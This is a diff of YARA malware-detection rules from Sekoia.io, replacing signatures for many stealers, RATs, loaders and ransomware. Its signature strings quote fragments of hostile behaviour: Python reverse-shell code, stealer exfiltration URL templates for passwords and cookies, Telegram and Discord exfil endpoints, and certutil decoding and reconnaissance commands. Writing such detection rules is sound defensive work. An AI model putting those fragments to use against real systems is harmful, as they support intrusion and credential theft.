-		hash = "20de7547d79d3637430b6a0787e59df5"
-		hash = "60d1e02316e6f22e078f9aa710790912"
-		hash = "e136e51efc22b0e071c11e7d652ea3be"
-		hash = "f466be81310147fcdd9a7886735a3786"
-		hash = "5065134cf4ba765bd97bb2edb61c5869"
-		hash = "6ed21c4f507e8cc830141ff732bd5acc"
-		hash = "40b2641150f291ca07bd08ab629fe1ed"
-		hash = "3f20cd14137e0abfa84b39e29a277350"
-		hash = "7dc8427be8b4d26a49fd380ad40d3b96"
-		logic_hash = "63ed3b1a991dc07bd06678a58449e0a67dd9453b358c0ac82a9c38235394122b"
+		reference = "https://blog.cyble.com/2022/07/07/nomercy-stealer-adding-new-features/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/nomercy.yar#L1-L61"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "175bc58f1b34bb60f6cacc15747e944cbbdd58fe287ff46abed969eaa39870db"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
+		hash1 = "9ecc76d4cda47a93681ddbb67b642c2e1f303ab834160ab94b79b47381e23a65"
+		hash2 = "557acce8b787aba87c8eeb939438b52c5ca953f28ad680a7faeb2b3046d3fda0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "DarkVision Installation" wide
-		$ = "You are about to install DarkVision Remote Access Tool." wide
+		$debug1 = "Posted uid and version" wide ascii
+		$debug2 = "Posted cli info to server" wide ascii
+		$debug3 = "Posted other info to server" wide ascii
+		$debug4 = "Sending screenshot..." wide ascii
+		$debug5 = "Sent screenshot" wide ascii
+		$debug6 = "Listening to Microphone..." wide ascii
+		$debug7 = "Collecting other info..." wide ascii
+		$url1 = "/a?uid=" wide ascii
+		$url2 = "/c?uid=" wide ascii
+		$url3 = "/d?uid=" wide ascii
+		$url4 = "/e?uid=" wide ascii
+		$url5 = "/b?sysinfoother=" wide ascii
+		$url6 = "/b?sysinfocli=" wide ascii
+		$info1 = "PUBLIC IP:" wide ascii
+		$info2 = "HWID:" wide ascii
+		$info3 = "RAM:" wide ascii
+		$info4 = "GPU:" wide ascii
+		$info5 = "MEDIA ACCESS CONTROL ADDRESS:" wide ascii
+		$info6 = "PRIVATE IP:" wide ascii
+		$info7 = "OS VERSION:" wide ascii
+		$info8 = "ANTIVIRUS:" wide ascii
+		$info9 = "KEYBOARD LANGUAGE:" wide ascii
+		$info10 = "CLIPBOARD: {0}{1}{2}" wide ascii
+		$info11 = "RUNNING PROCESSES:" wide ascii
+		$info12 = "WINDOW TITLE:" wide ascii
+		$cmd1 = "/c whoami /all" wide ascii
+		$cmd2 = "/c whoami" wide ascii
+		$cmd3 = "/c arp -a" wide ascii
+		$cmd4 = "/c ipconfig /all" wide ascii
+		$cmd5 = "/c net view /all" wide ascii
+		$cmd6 = "/c net share" wide ascii
+		$cmd7 = "/c route print" wide ascii
+		$cmd8 = "/c netstat -nao" wide ascii
+		$cmd9 = "/c net localgroup" wide ascii
+		$cmd10 = "/c systeminfo" wide ascii
+		$inv1 = "http://api.ipify.org" wide ascii
+		$inv2 = "NoMercy" wide ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 2 of them
+		uint16be( 0 ) == 0x4d5a and 3 of ( $debug* ) and 8 of ( $info* ) and 2 of ( $url* ) and 6 of ( $cmd* ) and 1 of ( $inv* ) and filesize > 700KB and filesize < 3000KB
 }
-rule SEKOIA_Pe_Princeransomware_Strings : FILE
+rule SEKOIA_Tool_Nssm_Strings : FILE
 {
 	meta:
-		description = "Prince Ransomware exe files"
+		description = "Detects nssm tool"
 		author = "Sekoia.io"
-		id = "9c5cad6e-2b11-469c-ace1-2dc51562b035"
-		date = "2024-08-07"
+		id = "fab99d44-6494-4bfc-80c0-67c45bad0425"
+		date = "2024-09-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/pe_princeransomware_strings.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "8bd8de169f45e32bab53f6e06088836d6f0526105f03efa1faf84f3b02c43011"
-		hash = "a83aad6861c8fdfe2392b8e286ab7051d223c6b0bbba5996165964f429657a37"
-		logic_hash = "18577c5673b4fc5280dee88aefac3747c254a97fdc84b584af241277361f6400"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_nssm_strings.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "beceae2fdc4f7729a93e94ac2ccd78cc"
+		logic_hash = "ca883f3ed9f510cbcd9b96ad167e9d6725341c311b023f22edcba721e801f07d"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "https://i.imgur.com/RfsCOES.png" ascii
-		$ = {596f75722066696c65732068617665206265656e20656e63727970746564207573696e67205072696e63652052616e736f6d77617265}
+		$ = "nssm start <servicename>" wide
+		$ = "nssm stop <servicename>" wide
+		$ = "nssm restart <servicename>" wide
+		$ = "nssm status <servicename>" wide
+		$ = "nssm rotate <servicename>" wide
 
 	condition:
-		all of them and uint16( 0 ) == 0x5a4d and filesize > 1MB
+		uint16be( 0 ) == 0x4d5a and all of them and filesize < 500KB
 }
-rule SEKOIA_Apt_Cloudmensis_Downloader_Strings : FILE
+
+rule SEKOIA_Implant_Win_Knotweed_Jumplump : FILE
 {
 	meta:
-		description = "Detects CloudMensis downloader"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "450cfa42-7b56-4d93-afe2-9cf5c1049217"
-		date = "2022-07-26"
+		id = "8f8cec7a-624b-4306-87f4-bde8ccc3a2d0"
+		date = "2022-07-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_cloudmensis_downloader_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9532530f9b6c39d64611354f5d3c95e7c8b9ebf917ab797c162c3b51945db1fc"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_win_knotweed_jumplump.yar#L3-L75"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a2637a8a082b6a23756da188808405046ae986a5973f64859462c92e9306e6c8"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "https://api.pcloud.com/getfilelink?path=%@&forcedownload=1"
-		$ = "python -c 'import os; print(os.confstr(65538))'"
-		$ = "getCmdResult:"
-		$ = "[pCloud DownloadFile:]"
+		$s1 = "DllCanUnloadNow"
+		$s2 = "DllGetClassObject"
+		$s3 = "_initterm"
+		$s4 = "__C_specific_handler"
+		$s5 = "HeapFree"
+		$s6 = "EnterCriticalSection"
+		$s7 = "EventUnregister"
+		$s8 = "LeaveCriticalSection"
+		$s9 = "WaitForSingleObject"
+		$s10 = "GetCurrentThreadId"
+		$s11 = "GetLastError"
+		$s12 = "CloseHandle"
+		$s13 = "HeapAlloc"
+		$s14 = "EventRegister"
+		$s15 = "GetProcAddress"
+		$s16 = "DeleteCriticalSection"
+		$s17 = "GetCurrentProcessId"
+		$s18 = "GetProcessHeap"
+		$s19 = "DisableThreadLibraryCalls"
+		$s20 = "Sleep"
+		$s21 = "RtlCaptureContext"
+		$s22 = "RtlLookupFunctionEntry"
+		$s23 = "RtlVirtualUnwind"
+		$s24 = "UnhandledExceptionFilter"
+		$s25 = "SetUnhandledExceptionFilter"
+		$s26 = "GetCurrentProcess"
+		$s27 = "TerminateProcess"
+		$s28 = "QueryPerformanceCounter"
+		$s29 = "GetSystemTimeAsFileTime"
+		$s30 = "GetTickCount"
+		$s31 = "CoCreateInstance"
+		$s32 = "RegCloseKey"
+		$s33 = "GetModuleFileNameW"
+		$s34 = "RegCreateKeyExW"
+		$s35 = "RegSetValueExW"
+		$s36 = "LocalFree"
+		$s37 = "RegOpenKeyExW"
+		$s38 = "OLEAUT32.dll"
+		$s39 = "memcpy"
+		$s40 = "memcmp"
+		$s41 = "memset"
+		$s42 = "LoadLibraryW"
+		$s43 = "OpenProcessToken"
+		$s44 = "DllRegisterServer"
+		$s45 = "DllUnregisterServer"
+		$s46 = "040904B0" wide
+		$api_hash1 = {5D 44 11 FF}
+		$api_hash2 = {4C 77 D6 07}
+		$api_hash3 = {38 68 0D 16}
+		$api_hash4 = {40 DE CE 72}
+		$api_hash5 = {08 87 1D 60}
+		$api_hash6 = {26 C6 0B 1B}
+		$api_hash7 = {0C DC 67 55}
+		$api_hash8 = {AA C5 E2 5D}
+		$api_hash9 = {C6 96 87 52}
+		$api_hash10 = {F8 8E C2 92}
 
 	condition:
-		uint32be( 0 ) == 0xcafebabe and filesize < 1MB and all of them
+		uint16( 0 ) == 0x5A4D and pe.number_of_sections == 7 and all of ( $s* ) and 1 of ( $api_hash* )
 }
-
-rule SEKOIA_Implant_Win_Mysterysnail : FILE
+rule SEKOIA_Infostealer_Win_Stormkitty_Exfil_Urls : FILE
 {
 	meta:
-		description = "Detect the MysterySnail using section hashes"
+		description = "Detect the open-source StormKitty spyware by looking for the github path"
 		author = "Sekoia.io"
-		id = "dfd2eba8-eb9c-411a-b5e0-663593453e3d"
-		date = "2021-10-13"
+		id = "d3b6e778-85da-4ab6-bc98-921897677485"
+		date = "2022-04-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_win_mysterysnail.yar#L4-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "37c02a5916ad7ce3190ce926d576365d1e17fee0f10e9b31619ea4b6fee29ae6"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_stormkitty_exfil_urls.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ccf0efe9ccba8e37bc19fa241e2d7698b1a798a3e8026b1b6930452b8a8ba9b4"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$s1 = "https://github.com/LimerBoy/StormKitty" ascii
+		$telegram = "https://api.telegram.org" wide
+		$discord = "https://cdn.discordapp.com" wide
+
 	condition:
-		uint16( 0 ) == 0x5A4D and ( pe.imphash ( ) == "de0c9e6aec27d278ccdb6718b3e96e32" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "a41b6fb1cc34d6393e30c13a58f6ecd4" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f263a2be76694feab7e2ce79ecf8b724" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e9056ae96619d7aa18daa973da592afc" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "3e38e89e9e8329f5cff8a7022d88fff7" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ce78f8599167c63e8f1c8d3e789c4a60" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "456d4f1096bf5c72cd6e1e3eb9980ec6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "37e2bff637001fc64566fe651757f66e" ) or hash.md5 ( pe.rich_signature.clear_data ) == "e4116fffa240ba6d91b400541ce85182" )
+		uint16( 0 ) == 0x5A4D and all of them and ( #telegram > 3 or #discord > 3 )
 }
-rule SEKOIA_Apt_Nobelium_Acrobox_Downloader_Apr2022 : FILE
+rule SEKOIA_Apt_Kimsuky_Malicious_Vba : FILE
 {
 	meta:
-		description = "Detects AcroBox downloader"
+		description = "Detects malicious VBA used by Kimsuky"
 		author = "Sekoia.io"
-		id = "77f7f01d-72a2-4b13-b23f-d938a415dd40"
-		date = "2022-05-11"
+		id = "2dbe2431-3592-4395-8164-49abae4a5a3d"
+		date = "2022-08-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_nobelium_acrobox_downloader_apr2022.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ebcbdf13908971eea3e5b291719527e2e454a9ee3b98b5dc66149b2bb3b8fe67"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_kimsuky_malicious_vba.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "68d7b757f660907fcea3ea03c4027b429f8acdef6569d63cdb744e9d77637080"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -235705,30 +236593,24 @@ rule SEKOIA_Apt_Nobelium_Acrobox_Downloader_Apr2022 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = { 80 ?? 7B
-        0F 84 ?? ?? 00 00
-        80 ?? ?? 0F
-        0F 84 ?? ?? 00 00
-        80 ?? ?? 0F
-        0F 84 ?? ?? 00 00
-        80 ?? ?? 0F
-        0F 84 ?? ?? 00 00 }
+		$ = "Certutil -decode %TMP%"
+		$ = "%LOCALAPPDATA%\\Microsoft\\Office"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 200KB and all of ( $s* )
+		uint32be( 0 ) == 0xD0CF11E0 and filesize < 1MB and all of them
 }
-rule SEKOIA_Tool_Scanline_Strings : FILE
+rule SEKOIA_Clwiper_Strings : FILE
 {
 	meta:
-		description = "Detects scanline (non-packed)"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "65677b81-d077-4d01-8398-cbb06ce49edf"
-		date = "2024-09-06"
+		id = "91e531e2-8548-460f-88a8-cc09abb901e0"
+		date = "2022-09-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_scanline_strings.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e02ae30451aa5eaffb588e92ecc221bf6ed07097bc493c6a55cf688da8b76151"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/clwiper_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b6bcd7e20b07ab8a9a54672f60a8ffe6d6bf787630f01b9dcefd1cbc78297050"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -235736,26 +236618,28 @@ rule SEKOIA_Tool_Scanline_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Resolve IP addresses to hostnames"
-		$ = "Randomize IP and port scan order"
-		$ = "?bhijnprsT"
-		$ = "sl -bht"
+		$w1 = "missing args"
+		$w2 = "wp starts"
+		$w3 = "Total Bytez : %lld"
+		$w4 = "percent is %f spent time is %.2fs"
+		$d1 = "\\\\?\\RawDisk3"
+		$d2 = "B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them
+		uint16be( 0 ) == 0x4d5a and ( 3 of ( $w* ) or all of ( $d* ) )
 }
-rule SEKOIA_Infostealer_Win_Acrstealer_Str : FILE
+rule SEKOIA_Bumblebee_Loader : FILE
 {
 	meta:
-		description = "Finds ACR Stealer standalone samples based on specific strings."
+		description = "Detect the BUMBLEBEE loader"
 		author = "Sekoia.io"
-		id = "63b4d6ff-0cab-44ec-9d53-bb2612371a48"
-		date = "2024-04-22"
+		id = "8fd795c7-6896-498c-a892-de9da6427b60"
+		date = "2022-05-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_acrstealer_str.yar#L1-L29"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "53d313857577b39b51a3e396c078d39a8b8ab803295b689357c3e8ea94cac9f7"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/bumblebee_loader.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "73c0195c51b5f8c36ab6d7a0e783f1229709d51fc42e2486c02fa65bbbdf955b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -235763,37 +236647,26 @@ rule SEKOIA_Infostealer_Win_Acrstealer_Str : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "ref.txt" ascii
-		$str02 = "Wininet.dll" ascii
-		$str03 = "Content-Type: application/octet-stream; boundary=----" ascii
-		$str04 = "POST" ascii
-		$str05 = "os_c" ascii fullword
-		$str06 = "en_k" ascii fullword
-		$str07 = "MyApp/1.0" ascii
-		$str08 = "/Up/b" ascii
-		$str09 = "Hello, World!" ascii
-		$str10 = "/ujs/" ascii
-		$str11 = "/Up/" ascii fullword
-		$str12 = "ostr" ascii fullword
-		$str13 = "brCH" ascii fullword
-		$str14 = "brGk" ascii fullword
-		$str15 = "https://steamcommunity.com/profiles/" ascii
+		$str0 = { 5a 00 3a 00 5c 00 68 00 6f 00 6f 00 6b 00 65 00 72 00 32 00 5c 00 43 00 6f 00 6d 00 6d 00 6f 00 6e 00 5c 00 6d 00 64 00 35 00 2e 00 63 00 70 00 70 00 }
+		$str1 = "/gate" ascii
+		$str2 = "3C29FEA2-6FE8-4BF9-B98A-0E3442115F67" wide
+		$str3 = "BLACK" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 10 of them
+		uint16be( 0 ) == 0x4d5a and 3 of them
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_11 : FILE
+rule SEKOIA_Infostealer_Win_Xehook_Str : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Finds XehookStealer standalone samples based on specific strings."
 		author = "Sekoia.io"
-		id = "703d2eb2-c9fd-4891-ba95-f94a8313618e"
-		date = "2023-02-03"
+		id = "fa76988d-f0a2-4fc2-a122-c104fd585f34"
+		date = "2024-06-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/generic_sharpshooter_payload_11.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "00c0dcc244db608d3a0d7500cdebadcc69ba0d56091a0a1fd7d58c27d255861f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_xehook_str.yar#L1-L32"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "543ec3b523e5f00d3c285e453c8d11f3d5c7778b2986b7fe03f2d62ff18c2778"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -235801,83 +236674,105 @@ rule SEKOIA_Generic_Sharpshooter_Payload_11 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "decodeHex = EL.NodeTypedValue"
-		$ = "Private Function decodeHex(hex)"
-		$ = "serialized_obj = serialized_obj & "
-		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)"
+		$str01 = "xehook" ascii
+		$str02 = "Classes.LogRecord" ascii
+		$str03 = "__  _____| |__   ___   ___ | | __" wide
+		$str04 = "\\ \\/ / _ \\ '_ \\ / _ \\ / _ \\| |/ /" wide
+		$str05 = " >  <  __/ | | | (_) | (_) |   <" wide
+		$str06 = "/_/\\_\\___|_| |_|\\___/ \\___/|_|\\_\\" wide
+		$str07 = "https://t.me/xehook" wide
+		$str08 = "About PC.txt" wide
+		$str09 = "Browser: {4} v{5} ({6})" wide
+		$str10 = "http://ip-api.com/json/?fields=11827" wide
+		$str11 = "{0}gate.php?id={1}&build={2}&passwords={3}&cookies={4}" wide
+		$str12 = "getjson.php?id=" wide
+		$com01 = "CheckRemoteDebuggerPresent" ascii
+		$com02 = "get_CurrentThread" ascii
+		$com03 = "get_InstalledInputLanguages" ascii
+		$com04 = "get_Ticks" ascii
+		$com05 = "System.Security.Cryptography" ascii
 
 	condition:
-		all of them and filesize < 2MB
+		uint16( 0 ) == 0x5A4D and 2 of ( $str* ) and 4 of ( $com* )
 }
-rule SEKOIA_Tool_Generic_Python_Reverse_Shell_Strings : FILE
+rule SEKOIA_Darkriver_Encodedurl : FILE
 {
 	meta:
-		description = "Detects reverse shell"
+		description = "Detects encoding URL inside docx documents"
 		author = "Sekoia.io"
-		id = "5b926d15-4f21-428c-a9fa-ee085a98d42b"
-		date = "2024-04-16"
+		id = "60f1676f-dade-4376-9980-f510dff52ae5"
+		date = "2023-10-10"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_generic_python_reverse_shell_strings.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "bb4fcef595f4be035815f536786987ac1343727f16c0560a1cb593e854ba8f17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/darkriver_encodedurl.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9477ec39cc1d4cfad676d071748e7e1918a3996b342663cb0a01658846bbf9f5"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "5c9551388213f54c4b54cd42ccb034d8d9173a4bbfcf8b666e0db8df929762e7"
+		hash1 = "13de9f39b1ad232e704b5e0b5051800fcd844e9f661185ace8287a23e9b3868e"
+		hash1 = "3b05e89ff2338472cc493d59bae450338effd29f0ed7d46fb999709e63cf2472"
 
 	strings:
-		$ = "import sys,socket,os,pty;"
-		$ = "[os.dup2(s.fileno(),fd) for fd in (0,1,2)]"
+		$s1 = "&#109;&#104;&#116;&#109;&#108;&#58;&#104;&#116;&#116;&#112;"
+		$s2 = "&#38;&#95;&#116;&#115;&#61;"
+		$header = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>"
 
 	condition:
-		all of them and filesize < 1000
+		filesize < 500KB and any of ( $s* ) and $header at 0
 }
-rule SEKOIA_Apt37_Rokrat_Macho
+rule SEKOIA_Apt_Lazarus_Vhd_Ransomware_Loader : FILE
 {
 	meta:
-		description = "Detects Public key of Macho samples of RokRAT"
+		description = "Detects VHD ransomware x64 loader "
 		author = "Sekoia.io"
-		id = "c54fb9ae-85fa-4c36-bab9-6c6d989262ba"
-		date = "2022-09-29"
+		id = "377f3ec5-fa2a-431e-93d2-6a1eb9e01d28"
+		date = "2022-11-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt37_rokrat_macho.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "526dc4594db099ed8090a673e761f84f6dd7ce860e380214e4d3f1ec08fc2345"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_lazarus_vhd_ransomware_loader.yar#L1-L30"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "33000fd79b5aae59dcbf445bb4d0d65cf5f939f376a4e3d9e23e14b11ca297da"
 		score = 75
-		quality = 66
-		tags = ""
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = { 4D 49 49 42 49 6A 41 4E 42 67 6B 71 68 6B 69 47 39 77 30 42 41 51 45 46 41 41 4F 43 41 51 38 41 4D 49 49 42 43 67 4B 43 41 51 45 41 73 47 52 59 53 45 56 76 77 6D 66 42 46 4E 42 6A 4F 7A 2B 51}
-		$s2 = {70 61 78 35 72 7A 57 66 2F 4C 54 2F 79 46 55 51 41 31 7A 72 41 31 6E 6A 6A 79 49 48 72 7A 70 68 67 63 39 74 67 47 48 73 2F 37 74 73 57 70 38 65 35 64 4C 6B 41 59 73 56 47 68 57 41 50 73 6A 79}
-		$s3 = {31 67 78 30 64 72 62 64 4D 6A 6C 54 62 42 59 54 79 45 67 35 50 67 79 2F 35 4D 73 45 4E 44 64 6E 73 43 52 57 72 32 33 5A 61 4F 45 4C 76 48 48 56 56 38 43 4D 43 38 46 75 34 57 62 61 7A 38 30 4C}
-		$s4 = {47 68 67 38 69 73 56 50 45 48 43 38 48 2F 79 47 74 6A 48 50 59 46 56 65 36 6C 77 56 72 2F 4D 58 6F 4B 63 70 78 31 33 53 31 4B 38 6E 6D 44 51 4E 41 68 4D 70 54 31 61 4C 61 47 2F 36 51 69 6A 68}
-		$s5 = {57 34 50 2F 52 46 51 71 2B 46 64 69 61 33 66 46 65 68 50 67 35 44 74 59 44 39 30 72 53 33 73 64 46 4B 6D 6A 39 4E 36 4D 4F 30 2F 57 41 56 64 5A 7A 47 75 45 58 44 35 33 4C 48 7A 39 65 5A 77 52}
-		$s6 = {39 59 38 37 38 36 6E 56 44 72 6C 6D 61 35 59 43 4B 70 71 55 5A 35 63 34 36 77 57 33 67 59 57 69 33 73 59 2B 56 53 33 62 32 46 64 41 4B 43 4A 68 54 66 43 79 38 32 41 55 47 71 50 53 56 66 4C 61}
-		$s7 = {6D 51 49 44 41 51 41 42}
+		$ = { B8 64 [8] B8 75 [8] B8 6D [8] B8 70 [8] B8 2E [8] B8 62 [8] B8 69 [8] B8 6E }
+		$ = { 48 63 ?? ?? ??
+        48 8B ?? ?? ??
+        0F BE ?? ??
+        B9 ?? ?? ?? ??
+        48 6B ?? ??
+        48 8B ?? ?? ??
+        0F BE ?? ??
+        ?? ??
+        48 63 ?? ?? ??
+        48 8B ?? ?? ??
+        88 ?? ??
+        EB }
+		$ = { 25 00 73 00 5c [3-15] 25 00 64 00 25 00 64 00 2e 00 62 00 69 00 6e }
 
 	condition:
-		all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 2 of them
 }
-rule SEKOIA_Apt_Aptk47_Asyncshell : FILE
+rule SEKOIA_Rat_Win_Ratel_Strings : FILE
 {
 	meta:
-		description = "Detects APT-K-47's Asyncshell"
+		description = "Detect RATel based on characteristic strings"
 		author = "Sekoia.io"
-		id = "2d009cf4-e30e-406d-8860-03b37a396ffa"
-		date = "2024-11-22"
+		id = "d0c8b89b-c811-47aa-9e03-717998c40d91"
+		date = "2023-04-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_aptk47_asyncshell.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "ce6a589d5e3604112e5595a1f8d53e1e"
-		hash = "751f427da8e11d8ab394574260735220"
-		logic_hash = "ac202f7dc317d17118badf71c32776c5666eea4a47e1b439a287b6b8766e9da6"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_ratel_strings.yar#L1-L28"
